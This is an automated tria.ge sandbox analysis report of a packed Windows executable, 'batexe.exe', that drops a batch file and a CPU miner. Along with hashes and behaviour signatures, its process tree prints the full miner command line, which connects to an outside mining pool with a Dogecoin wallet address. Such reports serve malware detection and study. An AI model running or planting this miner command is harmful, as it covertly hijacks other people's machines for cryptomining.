Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    295s
  • max time network
    305s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-ja
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
  • submitted
    13/02/2024, 20:27

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3544
    • C:\Users\Admin\AppData\Local\Temp\776D.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\776D.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\776D.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2316
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\85E4.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3236
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:916

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\776D.tmp\b2e.exe

    Filesize

    2.9MB

    MD5

    96e462bb5f0478e157eb7a50502aa53d

    SHA1

    05141f0b806e5901e0538a892d3bf47a8d5c0065

    SHA256

    49cd37ce474b6519dfda68a61bed9a399cb0a660cfafa6871232afc05ebbe84b

    SHA512

    b3cbc3d6af144a0425b95258882999d1ada3312502f69d98d31139b1ea3fdaf6b6fb4ea7d2cedc668b0729b01dd9bb4289026e87bb3c8658b3c37eb371cfdcf4

  • C:\Users\Admin\AppData\Local\Temp\776D.tmp\b2e.exe

    Filesize

    2.5MB

    MD5

    1fe2eb522f33b3c6d53b4f76b05b1aa1

    SHA1

    73a9b0da531ecf71a4cf1414ed3c8e0ac7ce9ab9

    SHA256

    5ff2605bb293da4eec397f82ecf69cfdea63bf8526195716404150c389ba8cd6

    SHA512

    b64c17992efa8177732bee4288c1d668264d2d94a103a3274ca99cec517ac7364e6175512d0d9e6b27a193a585aa3f0738c3e787a4503277add8e25c63d2ff3a

  • C:\Users\Admin\AppData\Local\Temp\776D.tmp\b2e.exe

    Filesize

    2.9MB

    MD5

    ffd8faa823f80da919e7f229d951f1e6

    SHA1

    8ead2dc5daced8c083170d081b9943405d48bf93

    SHA256

    a952b09614278542adce13a2ba0f01fb31c4906b60d68b155bf7abf0ffde723a

    SHA512

    b41a46f9fb62a67779a5e9cb51d185843d9d068fe6c00744ae75872a25c6b6ba05d290bd10f0bb053880e231c76821b2a2c334a60361761a1ea93bdd5c2992b3

  • C:\Users\Admin\AppData\Local\Temp\85E4.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    118KB

    MD5

    e3d606a3f48e8c2ddf1af0612d588ab3

    SHA1

    6de80e163f1c95d933019bf28897011b1a58b441

    SHA256

    b2fe3923a7bb5530c79539fba220c220ed58baf10b83f15c75f1f23a7a51768a

    SHA512

    7f40c44dc0bb14944ede3747b0dcc413a966f292e891de46fd1ec289669d156b01bf5df434f5762b29dae8e8434637b8ebe3b5e03b9bfe983945ae63aed8b269

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    168KB

    MD5

    9c834fcd6b7d326082a83b6c23e344d9

    SHA1

    ddf1af8b803e81e7db6d501300d47f1eb32f0a72

    SHA256

    f2f670b6e2ee21addbcbd651a772645bb3061745553e93077cdfcdafe206382d

    SHA512

    e5cfbf3a34574260e3b4c12c4d04582a5379af23d2320696961fb283e7efd7001402f30cd83414a2c1665631637dead990af85f924364ef4270e6472b3c7c688

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    5KB

    MD5

    6c490d143cab37c3471a7225a08fc1e5

    SHA1

    5c55e59318e75e59c162471a3583fb623f0f48e2

    SHA256

    c4eea8eecb0c26425c833eb295acdca434e96133dd64d415a38e886a79c314f8

    SHA512

    667831bb30abb26f9f303bdd5bad78e1d6d9a0e6b6ce22bc508a007f7e3508b7bc07cf1731196a1d5dfda69115cb88e47c904a9c64d0f7d2a244bc82f6fa8a78

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    836KB

    MD5

    aeab40ed9a8e627ea7cefc1f5cf9bf7a

    SHA1

    5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

    SHA256

    218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

    SHA512

    c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    126KB

    MD5

    9f409c7ccd84cb3d844bd7aca4064d5c

    SHA1

    0718ad22f9b61b329a64199f3c65f9db00e3a85d

    SHA256

    8d5bf7bf95f2eaea80795ff070ab6a084e24126541b529268f8ac725cc5642a6

    SHA512

    5442bb31afe45ef3916d5b06e7a76fd9af703d6402e4266c94c9cd66803bb62ba331c319b41f4b37a6e0827f0312f8be96456f054620eaa100be1a338b0d94f1

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    1.2MB

    MD5

    3c2772dfafe1d9c9d6d01de0360890b5

    SHA1

    a594cfdcb62e75fa1f8ba5f8f695b86e7a885295

    SHA256

    b524628aa71369a442005906ec9782a1fcedb5b91bf8d18b4c836a94b71d85fc

    SHA512

    865a4990ec5d01afe458a203f97d190e3500c0327a4fe761eeb1bec6ea52cec185b8cbd0ebdd83b24e96e1f6b5102dffe5e8baaf3bf39081bc86741fb26dfcc2

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    167KB

    MD5

    ed0b2236e3ea2a6d41cc32e293f65250

    SHA1

    9fb8e9b327245598e208a2213121236fbc6e0a19

    SHA256

    c750a994f592cf032bea7263afd722573e72890b0a21241351acab19d300c390

    SHA512

    30f0ee421462fd8beac9488e2d3fdce83f53d5ed48b55c71bcae98f6c483e5545d3b2e4c0d0b2aa6bc1c6c3b4cde03428417816910d4d93778f69159305afa5f

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    1.4MB

    MD5

    8ef7827630c5936601eebd4f8d25eb2a

    SHA1

    50be5cdd5eb97d4846bea92ff4b449b0de19303f

    SHA256

    7940ad0f941ae12801534010a46f56810a5e9ae798aa76264522e91527d8eac4

    SHA512

    f25e3ad8885222d0d432b98c7a16e42f1529614ee483800a988bfbc324547d9960d9cc3d3c7e47b20cbc1a787c91e4b62bdded9f86d9432a78c2daf0c3950b6a

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    606KB

    MD5

    585efec1bc1d4d916a4402c9875dff75

    SHA1

    d209613666ccac9d0ddab29a3bc59aa00a0968fa

    SHA256

    2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

    SHA512

    b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    14KB

    MD5

    57bc28e77ba7f02252d5d1c6ebeb7e33

    SHA1

    03d31966e052d14ff5f92d69ceacf8fc886e003c

    SHA256

    094b3dcb3308d87ee8c065d27dc1e0ee818c68d37312bdbc03af9c88f20914aa

    SHA512

    c11bdf493da9bac705cf4d31330ad4bfe2e93c5aa6c0812c47906645e441981880cd651ab20b53e0e9770053d8e3b5a7acdd515ec74f6e16a8c2cdccf49229d4

  • memory/916-47-0x0000000001140000-0x00000000029F5000-memory.dmp

    Filesize

    24.7MB

  • memory/916-69-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/916-43-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/916-44-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/916-45-0x0000000051D90000-0x0000000051E28000-memory.dmp

    Filesize

    608KB

  • memory/916-46-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/916-104-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/916-99-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/916-59-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/916-64-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/916-84-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/916-79-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2316-7-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/2316-53-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/3544-9-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB